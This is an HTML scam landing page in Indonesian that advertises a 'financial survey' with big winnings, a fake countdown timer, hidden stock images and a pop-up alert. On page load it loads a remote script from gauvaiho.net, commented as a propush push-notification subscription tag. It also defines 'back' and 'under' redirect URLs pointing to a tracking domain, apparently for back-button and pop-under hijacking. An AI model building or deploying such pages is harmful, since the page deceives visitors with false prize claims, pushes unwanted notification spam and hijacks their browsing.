<html lang="en">

<head>
  <meta name="pushsdk" content="a5034e6c68d4cb6a8cb95680f3fe3649">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta name="viewport" content="initial-scale=1,maximum-scale=1,user-scalable=no" />
  <title>Tes survei keuangan $$$</title>
  <link rel="icon" href="favicon.png" />
  <style>
    .photo {
      display: none;
    }
  </style>
  <style>
    .container {
      text-align: center;
      font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
      display: block;
      max-width: 300px;
      margin: auto
    }

    .timer {
      color: red;
      font-weight: 700;
      font-size: 150%;
      margin: 10px;
    }

    p {
      font-size: 18px;
      margin: 10px
    }

    .bold {
      font-weight: 700
    }

    img {
      max-width: 250px;
      padding: 8px
    }

    .button {
      background-color: green;
      color: #fff;
      padding: 18px;
      border-radius: 10px;
      max-width: 80%;
      margin: auto;
      font-size: 125%
    }

    h1 {
      margin-bottom: 5px;
      margin-top: 5%
    }
  </style>
</head>

<body>
  <div class="container">
    <h1>Hanya hari ini!</h1>
    <img src="woman1.jpg" class="photo" />
    <img src="woman2.jpg" class="photo" />
    <img src="woman3.jpg" class="photo" />
    <img src="woman4.jpg" class="photo" />
    <img src="woman5.jpg" class="photo" />
    <img src="woman6.jpg" class="photo" />
    <img src="woman9.jpg" class="photo" />
    <img src="woman10.jpg" class="photo" />
    <img src="woman11.jpg" class="photo" />
    <img src="woman12.jpg" class="photo" />
    <img src="woman13.jpg" class="photo" />
    <img src="woman14.jpg" class="photo" />
    <img src="woman15.jpg" class="photo" />

    <p>Jawab pertanyaan keuangan ini dan <span class="">MENANG BESAR!</span></p>
    <p class="bold">PENAWARAN HANYA BERLAKU UNTUK:</p>
    <p class="timer" id="timer">01:59</p>
    <div>MULAI SEKARANG</div>
  </div>
  <script src="script.js" type="application/javascript"></script>
  <script type="text/javascript">
    setTimeout(function () { alert('Pansin!'); }, 500); 
  </script>
  <script>
    var s = document.createElement('script');
    s.src = '//gauvaiho.net/pfe/current/micro.tag.min.js?z=5960881' + '&sw=/sw-check-permissions-0a98c.js';     /*propush订阅脚本*/
    s.onload = function (result) {
      switch (result) {
        case 'onPermissionDefault': break;
        case 'onPermissionAllowed': break;
        case 'onPermissionDenied': break;
        case 'onAlreadySubscribed': break;
        case 'onNotificationUnsupported': break;
      }
    }
    document.head.appendChild(s);
  </script>
  <script>
    var back = 'https://track.toackeerby.shop/cwdhl0k.php?lp=1';
    var under = 'https://track.toackeerby.shop/cwdhl0k.php?lp=1';    
  </script>
</body>

</html>